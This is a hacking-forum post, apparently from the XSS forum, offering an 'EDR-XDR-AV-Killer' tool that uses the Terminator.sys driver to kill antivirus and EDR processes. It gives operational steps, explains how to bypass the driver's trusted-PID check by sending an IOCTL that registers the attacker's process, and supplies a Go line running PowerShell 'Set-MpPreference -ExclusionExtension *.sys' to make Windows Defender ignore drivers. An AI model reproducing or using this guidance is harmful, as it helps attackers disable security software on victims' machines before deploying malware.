• XSS.stack #1 – первый литературный журнал от юзеров форума

прочее EDR-XDR-AV-Killer

Focus17

(L2) cache
Пользователь
Регистрация
10.10.2019
Сообщения
328
Реакции
51
Гарант сделки
2
Депозит
0.11

Usage​


  • Place the driver Terminator.sys in the same path as the executable
  • run the program as an administrator
  • keep the program running to prevent the service from restarting the anti-malwares

338064995-5dab4648-35e5-4fa0-a62f-24c04a029463.png


Technical details​

The driver contains some protectiion mechanism that only allow trusted Process IDs to send IOCTLs, Without adding your process ID to the trusted list, you will receive an 'Access Denied' message every time. However, this can be easily bypassed by sending an IOCTL with our PID to be added to the trusted list, which will then permit us to control numerous critical IOCTLs


243470258-e26238c8-fcf8-40ec-9ed8-8e8de9436093.png


  • Comes with simple antidbg.
  • Add This so WD Ignores defender by this quick sample
exec.Command("powershell", "-Command", "Set-MpPreference -ExclusionExtension *.sys -Force").Run()
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх